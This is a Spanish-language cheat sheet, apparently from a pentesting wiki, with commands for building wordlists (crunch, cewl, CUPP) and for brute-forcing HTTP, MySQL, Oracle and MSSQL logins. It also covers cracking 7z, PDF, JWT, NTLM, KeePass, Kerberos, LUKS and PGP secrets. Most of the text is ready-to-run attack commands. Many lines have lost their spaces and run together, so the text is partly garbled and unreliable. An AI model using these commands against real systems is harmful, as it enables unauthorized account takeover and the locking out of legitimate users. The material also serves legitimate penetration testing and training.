Utiliza combinaciones de tipos de caracteres para generar diccionarios.
crunch460123456789ABCDEF-ocrunch1.txt#From length 4 to 6 using that alphabetcrunch44-f/usr/share/crunch/charset.lstmixalpha# Only length 4 using charset mixalpha (inside file charset.lst)###@Lowercasealphacharacters,Uppercasealphacharacters%Numericcharacters^Specialcharactersincludingspac###crunch68-t,@@^^%%
Cewl
Utiliza el contenido de una página web para generar un diccionario.
cewlexample.com-m5-wwords.txt
CUPP
Utiliza el conocimiento que tienes acerca de la víctima para generar contraseñas (nombre, fechas, mascotas...).
python3 cupp.py -h
pydictor
Permite generar diccionarios de múltiples maneras.
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for httpSmedusa-h<IP>-u<username>-P<passwords.txt>-Mhttp-mDIR:/path/to/auth-T10
HTTP - Post Form
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for httpS
Para https tienes que cambiar "http-post-form" a "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
# hydrahydra-Lusernames.txt-Ppass.txt<IP>mysql# msfconsolemsf> useauxiliary/scanner/mysql/mysql_login; setVERBOSEfalse# medusamedusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
OracleSQL
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.pypasswordguesser-s $SERVER -d $SID./odat.pypasswordguesser-s $MYSERVER -p $PORT --accounts-fileaccounts_multiple.txt#msf1msf> useadmin/oracle/oracle_loginmsf> setRHOSTS<IP>msf> setRPORT1521msf> setSID<SID>#msf2, this option uses nmap and it fails sometimes for some reasonmsf> usescanner/oracle/oracle_loginmsf> setRHOSTS<IP>msf> setRPORTS1521msf> setSID<SID>#nmap fails sometimes for some reson executing this scriptnmap--scriptoracle-brute-p1521--script-argsoracle-brute.sid=<SID><IP>
Para usar oracle_login con patator tienes que instalar:
#Use the NetBIOS name of the machine as domaincrackmapexecmssql<IP>-d<DomainName>-uusernames.txt-ppasswords.txthydra-L/root/Desktop/user.txt–P/root/Desktop/pass.txt<IP>mssqlmedusa-h<IP>–U/root/Desktop/user.txt–P/root/Desktop/pass.txt–Mmssqlnmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be carefull with the number of password in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
#Download and install requirements for 7z2johnwgethttps://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.plapt-getinstalllibcompress-raw-lzma-perl./7z2john.plfile.7z>7zhash.john
PDF
apt-getinstallpdfcrackpdfcrackencrypted.pdf-w/usr/share/wordlists/rockyou.txt#pdf2john didnt worked well, john didnt know which hash type was# To permanently decrypt the pdfsudoapt-getinstallqpdfqpdf--password=<PASSWORD>--decryptencrypted.pdfplaintext.pdf
JWT
gitclonehttps://github.com/Sjord/jwtcrack.gitcdjwtcrack#Bruteforce using crackjwt.pypython crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using johnpython jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
johnjwt.john#It does not work with Kali-John
NTLM cracking
Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
Keepass
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepas is also using a file as a needed credential
#The keepass can use password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Keberoasting
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
Method 2
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
PGP/GPG Private key
gpg2john private_pgp.key #This will generate the hash, save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
Tools
Hash-identifier
hash-identifier
> <HASH>
John mutation
Read /etc/john/john.conf and configure it
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules